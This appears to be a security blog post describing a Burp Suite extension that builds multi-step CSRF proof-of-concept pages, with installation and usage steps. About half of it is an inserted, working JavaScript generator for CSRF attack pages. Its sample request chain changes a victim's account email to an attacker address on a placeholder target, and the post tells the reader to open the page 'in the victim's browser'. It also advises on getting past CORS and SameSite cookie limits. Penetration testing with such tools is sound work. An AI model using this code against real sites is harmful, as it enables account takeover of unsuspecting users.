Sunday, December 8th, 2019


KelvinSecurity – News – Cyber Security News – ETHICAL HACKINg – Pentesting – OSINT

Burp extension to generate multi-step CSRF POC


Ever wanted to combine the individual CSRF POCs in Burp into a single HTML? Or ever wished that Burp generated CSRF POCs combining two or more requests? Look no further!

The Multi-step CSRF POC extension for Burp combines two or more requests into a single HTML POC. It also lets you choose how the generated page sends those requests: with plain HTML forms, with XMLHttpRequest (XHR), or with jQuery.
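As an added example (not the extension's own code, and not part of the original post), the following Node.js script builds the same kind of multi-step POC from a list of captured requests, in the form-based and XHR styles the extension offers. The target host, paths and parameters are invented for illustration; the point is how the second request is made to wait for the first.

```javascript
// Added example (not the extension's own code): build a multi-step CSRF POC page
// from a list of captured requests, in two of the styles the extension offers
// (plain HTML forms, and XMLHttpRequest). Host, paths and parameters are hypothetical.

// Escape attacker-controlled strings before placing them in HTML attributes, so a
// stray quote in a parameter value cannot break the generated markup.
const escapeHtml = (s) => String(s)
  .replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
  .replace(/"/g, "&quot;").replace(/'/g, "&#39;");

// Constructed sample: two POSTs that only work in this order, e.g. "start an email
// change" followed by "confirm it". In practice these come from Burp's HTTP history.
const sampleRequests = [
  { method: "POST", url: "https://target.example/account/email/start",
    params: { email: "attacker@evil.example" } },
  { method: "POST", url: "https://target.example/account/email/confirm",
    params: { confirm: "1" } },
];

// One hidden form per request, each targeting its own hidden iframe.
function formStep(req, i) {
  const inputs = Object.entries(req.params).map(([k, v]) =>
    `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`).join("\n");
  return [
    `  <iframe name="f${i}" id="f${i}" style="display:none"></iframe>`,
    `  <form id="step${i}" method="${escapeHtml(req.method)}" action="${escapeHtml(req.url)}" target="f${i}">`,
    inputs,
    `  </form>`,
  ].join("\n");
}

// Form-based POC: the iframe's load event (the response to step i arriving) submits
// step i+1, so the requests go out strictly in order while the POC page stays put.
function generateFormPoc(requests) {
  const forms = requests.map(formStep).join("\n");
  const script = `
  <script>
    var n = ${requests.length};
    function submitStep(i) {
      if (i >= n) return;
      document.getElementById("f" + i).onload = function () { submitStep(i + 1); };
      document.getElementById("step" + i).submit();
    }
    submitStep(0);
  </script>`;
  return `<!DOCTYPE html>\n<html><body>\n${forms}${script}\n</body></html>\n`;
}

// XHR-based POC: each request is fired from the previous one's onloadend handler
// (which also fires on a CORS error, so the chain continues even though the attacker
// page can never read the responses). withCredentials attaches the victim's cookies;
// the form-encoded body keeps each request a CORS "simple request", so no preflight.
function generateXhrPoc(requests) {
  const steps = requests.map((req) => ({
    method: req.method,
    url: req.url,
    body: new URLSearchParams(req.params).toString(),
  }));
  // "<" is escaped inside the JSON so a value containing "</script>" cannot end the script block.
  const json = JSON.stringify(steps).replace(/</g, "\\u003c");
  const script = `
  <script>
    var steps = ${json};
    function send(i) {
      if (i >= steps.length) return;
      var x = new XMLHttpRequest();
      x.open(steps[i].method, steps[i].url, true);
      x.withCredentials = true;
      x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      x.onloadend = function () { send(i + 1); };
      x.send(steps[i].body);
    }
    send(0);
  </script>`;
  return `<!DOCTYPE html>\n<html><body>${script}\n</body></html>\n`;
}

// Usage: node this_file.js > poc.html, then open poc.html in the victim's browser.
if (typeof require !== "undefined" && require.main === module) {
  console.log(generateFormPoc(sampleRequests));
}
```

The form-based variant only covers what an HTML form can send (GET or POST with a form-encoded body), which is one reason the extension also offers XHR and jQuery output. The XHR variant can use other methods and content types, but anything beyond a CORS simple request (a JSON body, a PUT, a custom header) triggers a preflight that the target will almost certainly reject. Whichever variant you generate, the POC only proves the bug if the victim's session cookie is actually sent cross-site: a cookie marked SameSite=Lax or Strict stops these POSTs before the server sees them, so check the Set-Cookie attributes before concluding the chain is exploitable.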

Getting Started

Installing the extension

  • Download the Jython standalone JAR into a directory of its own.
  • In Burp, go to "Extender" -> "Options" and, under "Java Environment", set that directory as the folder Burp loads library JAR files from. The extension itself is loaded as a Java JAR, and this is how it finds Jython.
  • Download the latest release JAR from the project's releases page, then go to "Extender" -> "Extensions", click "Add", and select the downloaded JAR as the extension file.

Using the extension

Generating a new multi-step CSRF POC

  • Once loaded, select a few requests in Burp’s “HTTP history” tab.
  • Right-click and select “Multi-Step CSRF POC” -> “Generate new Multi-Step CSRF POC”.

Adding to existing CSRF POC

  • Make sure an existing Multi-step CSRF POC window is open.
  • Select one or more requests in Burp's "HTTP history" tab.
  • Right-click, select "Multi-Step CSRF POC" -> "Add to existing POC", and pick the POC window the new request(s) should be added to.

Other Features

The extension also supports:

  • reordering the requests in the Multi-step CSRF POC window.
  • modifying the requests in the window and regenerating the HTML.
  • removing added requests.
  • copying the generated HTML to the clipboard.
  • reporting errors: the exception message is shown in the bottom-most text area of the window, and the full stack trace in the extension's "Errors" tab under "Extender".
